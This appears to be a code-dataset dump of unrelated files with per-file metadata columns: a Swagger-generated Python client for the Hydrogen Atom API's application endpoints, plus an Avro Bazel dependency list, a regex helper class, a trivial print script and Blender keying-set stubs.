# coding: utf-8
"""
Hydrogen Atom API
The Hydrogen Atom API # noqa: E501
OpenAPI spec version: 1.7.0
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class ApplicationApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen

    CRUD wrapper around the ``/application`` endpoints; every public method
    has a ``*_with_http_info`` twin that does the actual parameter
    validation and HTTP call via ``self.api_client``.
    """

    def __init__(self, api_client=None):
        # Default to a freshly-constructed client when none is injected.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def create_application_using_post(self, application, **kwargs):  # noqa: E501
        """Create an application  # noqa: E501

        Create an application  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_application_using_post(application, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Application application: application (required)
        :return: Application
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_application_using_post_with_http_info(application, **kwargs)  # noqa: E501
        else:
            (data) = self.create_application_using_post_with_http_info(application, **kwargs)  # noqa: E501
            return data

    def create_application_using_post_with_http_info(self, application, **kwargs):  # noqa: E501
        """Create an application  # noqa: E501

        Create an application  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_application_using_post_with_http_info(application, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Application application: application (required)
        :return: Application
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['application']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument the generated signature does not know.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_application_using_post" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'application' is set
        if ('application' not in params or
                params['application'] is None):
            raise ValueError("Missing the required parameter `application` when calling `create_application_using_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'application' in params:
            body_params = params['application']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/application', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Application',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_application_using_delete(self, application_id, **kwargs):  # noqa: E501
        """Delete an Application  # noqa: E501

        Permanently delete an Application.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_application_using_delete(application_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str application_id: UUID application_id (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_application_using_delete_with_http_info(application_id, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_application_using_delete_with_http_info(application_id, **kwargs)  # noqa: E501
            return data

    def delete_application_using_delete_with_http_info(self, application_id, **kwargs):  # noqa: E501
        """Delete an Application  # noqa: E501

        Permanently delete an Application.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_application_using_delete_with_http_info(application_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str application_id: UUID application_id (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['application_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument the generated signature does not know.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_application_using_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'application_id' is set
        if ('application_id' not in params or
                params['application_id'] is None):
            raise ValueError("Missing the required parameter `application_id` when calling `delete_application_using_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'application_id' in params:
            path_params['application_id'] = params['application_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/application/{application_id}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_application_all_using_get(self, **kwargs):  # noqa: E501
        """List all Application  # noqa: E501

        Get details for all Application.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_application_all_using_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param bool ascending: ascending
        :param str filter: filter
        :param str order_by: order_by
        :param int page: page
        :param int size: size
        :return: PageApplication
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_application_all_using_get_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_application_all_using_get_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_application_all_using_get_with_http_info(self, **kwargs):  # noqa: E501
        """List all Application  # noqa: E501

        Get details for all Application.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_application_all_using_get_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param bool ascending: ascending
        :param str filter: filter
        :param str order_by: order_by
        :param int page: page
        :param int size: size
        :return: PageApplication
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['ascending', 'filter', 'order_by', 'page', 'size']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument the generated signature does not know.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_application_all_using_get" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        # Only the paging/filtering options actually supplied are forwarded.
        query_params = []
        if 'ascending' in params:
            query_params.append(('ascending', params['ascending']))  # noqa: E501
        if 'filter' in params:
            query_params.append(('filter', params['filter']))  # noqa: E501
        if 'order_by' in params:
            query_params.append(('order_by', params['order_by']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        if 'size' in params:
            query_params.append(('size', params['size']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/application', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageApplication',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_application_using_get(self, application_id, **kwargs):  # noqa: E501
        """Retrieve an Application  # noqa: E501

        Retrieve the information for an Application.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_application_using_get(application_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str application_id: UUID application_id (required)
        :return: Application
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_application_using_get_with_http_info(application_id, **kwargs)  # noqa: E501
        else:
            (data) = self.get_application_using_get_with_http_info(application_id, **kwargs)  # noqa: E501
            return data

    def get_application_using_get_with_http_info(self, application_id, **kwargs):  # noqa: E501
        """Retrieve an Application  # noqa: E501

        Retrieve the information for an Application.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_application_using_get_with_http_info(application_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str application_id: UUID application_id (required)
        :return: Application
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['application_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument the generated signature does not know.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_application_using_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'application_id' is set
        if ('application_id' not in params or
                params['application_id'] is None):
            raise ValueError("Missing the required parameter `application_id` when calling `get_application_using_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'application_id' in params:
            path_params['application_id'] = params['application_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/application/{application_id}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Application',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def update_application_using_put(self, application, application_id, **kwargs):  # noqa: E501
        """Update an Application  # noqa: E501

        Update the information for an Application  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_application_using_put(application, application_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Application application: application (required)
        :param str application_id: UUID application_id (required)
        :return: Application
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_application_using_put_with_http_info(application, application_id, **kwargs)  # noqa: E501
        else:
            (data) = self.update_application_using_put_with_http_info(application, application_id, **kwargs)  # noqa: E501
            return data

    def update_application_using_put_with_http_info(self, application, application_id, **kwargs):  # noqa: E501
        """Update an Application  # noqa: E501

        Update the information for an Application  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_application_using_put_with_http_info(application, application_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Application application: application (required)
        :param str application_id: UUID application_id (required)
        :return: Application
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['application', 'application_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject any keyword argument the generated signature does not know.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_application_using_put" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'application' is set
        if ('application' not in params or
                params['application'] is None):
            raise ValueError("Missing the required parameter `application` when calling `update_application_using_put`")  # noqa: E501
        # verify the required parameter 'application_id' is set
        if ('application_id' not in params or
                params['application_id'] is None):
            raise ValueError("Missing the required parameter `application_id` when calling `update_application_using_put`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'application_id' in params:
            path_params['application_id'] = params['application_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'application' in params:
            body_params = params['application']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/application/{application_id}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Application',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 39.328996
| 140
| 0.620918
| 2,370
| 21,159
| 5.270042
| 0.069198
| 0.04996
| 0.036509
| 0.028823
| 0.933787
| 0.916333
| 0.907926
| 0.892954
| 0.878943
| 0.873339
| 0
| 0.016547
| 0.291649
| 21,159
| 537
| 141
| 39.402235
| 0.816787
| 0.326008
| 0
| 0.773852
| 1
| 0
| 0.189191
| 0.05412
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038869
| false
| 0
| 0.014134
| 0
| 0.109541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3c740f4e2412a1107df73c0b3f23abda485ff1b0
| 132
|
bzl
|
Python
|
third_party/avro/defs.bzl
|
melsicon/kafka-sensors
|
db8d23d0bcf1d7511125921d7ddee748957c0ce1
|
[
"Apache-2.0"
] | 8
|
2019-11-21T08:27:08.000Z
|
2021-05-23T06:50:03.000Z
|
third_party/avro/defs.bzl
|
melsicon/kafka-sensors
|
db8d23d0bcf1d7511125921d7ddee748957c0ce1
|
[
"Apache-2.0"
] | 1
|
2021-08-25T05:11:09.000Z
|
2021-08-25T05:11:09.000Z
|
third_party/avro/defs.bzl
|
melsicon/kafka-sensors
|
db8d23d0bcf1d7511125921d7ddee748957c0ce1
|
[
"Apache-2.0"
] | 1
|
2020-02-03T12:55:50.000Z
|
2020-02-03T12:55:50.000Z
|
""" Apache Avro dependencies. """

# Maven coordinates for the Avro runtime and its code-generation tool.
# Keep both artifacts pinned to the same version.
AVRO_ARTIFACTS = [
    "org.apache.avro:avro-tools:1.10.2",
    "org.apache.avro:avro:1.10.2",
]
| 18.857143
| 40
| 0.628788
| 20
| 132
| 4.1
| 0.45
| 0.365854
| 0.317073
| 0.414634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0.151515
| 132
| 6
| 41
| 22
| 0.660714
| 0.189394
| 0
| 0
| 0
| 0
| 0.606061
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c7aa54cc8470b863515f5c44b41eb0bf8d13945
| 580
|
py
|
Python
|
app/helpers/regex_helper/__init__.py
|
sebbesiren/game-api
|
5d4a6629995a908b89155738dd70646af5f76038
|
[
"MIT"
] | null | null | null |
app/helpers/regex_helper/__init__.py
|
sebbesiren/game-api
|
5d4a6629995a908b89155738dd70646af5f76038
|
[
"MIT"
] | null | null | null |
app/helpers/regex_helper/__init__.py
|
sebbesiren/game-api
|
5d4a6629995a908b89155738dd70646af5f76038
|
[
"MIT"
] | null | null | null |
class RegexHelper:
    """Reusable validation regexes, anchored and intended for ``re.match``.

    All patterns are raw strings: the originals were plain strings whose
    ``\\+``/``\\d``/``\\.`` sequences are invalid string escapes that emit
    DeprecationWarnings on modern Python (and will eventually be errors).
    The pattern bytes are unchanged.
    """

    # Swedish personal number: YYYYMMDDNNNN with 19xx/20xx centuries.  The
    # day part also accepts 61-91 -- presumably to cover coordination
    # numbers ("samordningsnummer", day + 60); confirm that is intended.
    SWEDISH_PRIVATE_PERSON = r"^(19|20)[0-9]{2}((0[1-9])|(1[0-2]))(([06][1-9])|([1278][0-9])|([39][0-1]))[0-9]{4}$"
    # Pragmatic lower-case e-mail pattern (not a full RFC 5322 validator).
    EMAIL_ADDRESS = r"[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$"
    # International format: a leading '+' followed by one or more digits.
    MOBILE_PHONE = r"^\+(\d+)$"
    # 3-70 characters drawn from lower-case letters, digits, '_' and '-'.
    USERNAME = r"^([a-z0-9_-]){3,70}$"
    # Dotted-quad IPv4 address with each octet constrained to 0-255.
    IP_NUMBER = r"^(([2]([0-4][0-9]|[5][0-5])|[0-1]?[0-9]?[0-9])[.]){3}(([2]([0-4][0-9]|[5][0-5])|[0-1]?[0-9]?[0-9]))$"
    # 8-4-4-4-12 hexadecimal GUID with hyphen separators.
    GUID = r"^([0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12})$"
| 72.5
| 156
| 0.382759
| 120
| 580
| 1.783333
| 0.283333
| 0.084112
| 0.168224
| 0.163551
| 0.406542
| 0.406542
| 0.406542
| 0.406542
| 0.406542
| 0.406542
| 0
| 0.179104
| 0.075862
| 580
| 7
| 157
| 82.857143
| 0.220149
| 0
| 0
| 0
| 0
| 0.571429
| 0.746552
| 0.696552
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
590218c05a393b9837cfde7626ff0264d6038def
| 287
|
py
|
Python
|
production/keyphrase/try.py
|
ramaganapathy1/AMuDA-Ir-back-end
|
179bf52fd303440fff661c074c7835c4932d5165
|
[
"MIT"
] | 2
|
2017-09-20T07:47:08.000Z
|
2017-09-27T12:26:11.000Z
|
production/keyphrase/preprocess_audio/try.py
|
ramaganapathy1/AMuDA-Ir-back-end
|
179bf52fd303440fff661c074c7835c4932d5165
|
[
"MIT"
] | null | null | null |
production/keyphrase/preprocess_audio/try.py
|
ramaganapathy1/AMuDA-Ir-back-end
|
179bf52fd303440fff661c074c7835c4932d5165
|
[
"MIT"
] | 2
|
2017-09-27T12:26:13.000Z
|
2018-12-11T00:37:53.000Z
|
# The original was 13 copy-pasted Python 2 `print` statements.  Using the
# print function (backported via __future__ so Python 2 output is
# byte-identical) and a loop removes the repetition and makes the script
# valid under Python 3 as well.
from __future__ import print_function

for _ in range(13):
    print("hello dude!!!")
| 19.133333
| 21
| 0.634146
| 39
| 287
| 4.666667
| 0.076923
| 0.714286
| 1
| 1.252747
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.139373
| 287
| 14
| 22
| 20.5
| 0.736842
| 0
| 0
| 1
| 0
| 0
| 0.590909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 12
|
590362c027fbf411378e59bc42cd44cc47fd7157
| 40,936
|
py
|
Python
|
typings/keyingsets_builtins.py
|
Argmaster/PyR3
|
6786bcb6a101fe4bd4cc50fe43767b8178504b15
|
[
"MIT"
] | 2
|
2021-12-12T18:51:52.000Z
|
2022-02-23T09:49:16.000Z
|
src/blender/blender_autocomplete-master/2.92/keyingsets_builtins.py
|
JonasWard/ClayAdventures
|
a716445ac690e4792e70658319aa1d5299f9c9e9
|
[
"MIT"
] | 2
|
2021-11-08T12:09:02.000Z
|
2021-12-12T23:01:12.000Z
|
src/blender/blender_autocomplete-master/2.92/keyingsets_builtins.py
|
JonasWard/ClayAdventures
|
a716445ac690e4792e70658319aa1d5299f9c9e9
|
[
"MIT"
] | null | null | null |
import sys
import typing
import bpy_types
class BUILTIN_KSI_Available(bpy_types.KeyingSetInfo):
    """Stub of Blender's built-in "Available" keying set.

    Auto-generated autocomplete skeleton: every attribute is a ``None``
    placeholder and every method is a no-op; the real implementations
    live inside Blender's runtime.
    """

    # RNA attribute placeholders; filled in by Blender at runtime.
    bl_idname = None
    bl_label = None
    bl_rna = None
    id_data = None

    def as_pointer(self):
        """Stub; no-op."""
        pass

    def bl_rna_get_subclass(self):
        """Stub; no-op."""
        pass

    def bl_rna_get_subclass_py(self):
        """Stub; no-op."""
        pass

    def driver_add(self):
        """Stub; no-op."""
        pass

    def driver_remove(self):
        """Stub; no-op."""
        pass

    def generate(self, _ksi, _context, ks, data):
        """Stub; no-op."""
        pass

    def get(self):
        """Stub; no-op."""
        pass

    def is_property_hidden(self):
        """Stub; no-op."""
        pass

    def is_property_overridable_library(self):
        """Stub; no-op."""
        pass

    def is_property_readonly(self):
        """Stub; no-op."""
        pass

    def is_property_set(self):
        """Stub; no-op."""
        pass

    def items(self):
        """Stub; no-op."""
        pass

    def iterator(self, ksi, context, ks):
        """Stub; no-op."""
        pass

    def keyframe_delete(self):
        """Stub; no-op."""
        pass

    def keyframe_insert(self):
        """Stub; no-op."""
        pass

    def keys(self):
        """Stub; no-op."""
        pass

    def path_from_id(self):
        """Stub; no-op."""
        pass

    def path_resolve(self):
        """Stub; no-op."""
        pass

    def poll(self, ksi, context):
        """Stub; no-op."""
        pass

    def pop(self):
        """Stub; no-op."""
        pass

    def property_overridable_library_set(self):
        """Stub; no-op."""
        pass

    def property_unset(self):
        """Stub; no-op."""
        pass

    def type_recast(self):
        """Stub; no-op."""
        pass

    def values(self):
        """Stub; no-op."""
        pass
class BUILTIN_KSI_BendyBones(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, _ksi, _context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_DeltaLocation(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_DeltaRotation(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_DeltaScale(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, ksi, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, _ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_LocRot(bpy_types.KeyingSetInfo):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, ksi, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BUILTIN_KSI_LocRotScale(bpy_types.KeyingSetInfo):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def generate(self, context, ks, data):
'''
'''
pass
def get(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def iterator(self, ksi, context, ks):
'''
'''
pass
